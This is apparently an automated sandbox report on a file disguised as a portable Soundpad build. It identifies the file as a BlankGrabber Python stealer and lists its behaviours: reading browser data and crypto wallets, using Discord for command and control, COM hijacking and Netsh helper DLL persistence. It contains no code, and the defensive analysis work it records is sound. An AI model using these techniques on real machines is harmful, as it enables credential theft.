Analysis Overview
SHA256
a3ca472931818386738680dd8c6ce53e9bda2af06213f2ab27f3516eeebc03a7
Threat Level: Known bad
The file Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Event Triggered Execution: Component Object Model Hijacking
Loads dropped DLL
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Drops file in Program Files directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Gathers system information
Enumerates processes with tasklist
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Modifies registry class
Detects videocard installed
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 00:08
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 00:08
Reported
2024-06-21 00:10
Platform
win10v2004-20240611-en
Max time kernel
64s
Max time network
66s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\UniteFx1.8.0.dll | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Common Files\Soundpad\SoundpadService.exe | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Soundpad\SoundpadService.exe | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71} | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\ = "URL:Soundpad Protocol" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MinOutputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MaxInstances = "4294967295" | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3169499791-3545231813-3156325206-1000\{FE0B0A1D-A10D-4231-B8EA-549B579EA409} | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithProgids\Soundpad.Soundlist | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MinInputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\ = "Soundpad sound list" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MinorVersion = "8" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MaxOutputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\ = "Soundpad.Soundlist" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open\command\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open\command | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\FriendlyName = "UniteFx" | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList\ehshell.exe | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\Copyright = "Copyright (C) 2016-2024 Leppsoft" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\PerceivedType = "audio" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MaxInputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList\ehshell.exe\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe,0" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\InprocServer32\ThreadingModel = "Both" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe\" -c \"%1\"" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\APOInterface0 = "{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}" | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open\command | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open\command\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\URL Protocol | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\Flags = "14" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\NumAPOInterfaces = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\ = "UniteFx Class" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\InprocServer32\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MajorVersion = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe,1" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\Content Type = "audio/soundpadlist" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList\ehshell.exe\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\InprocServer32\ = "C:\\Windows\\system32\\UniteFx1.8.0.dll" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
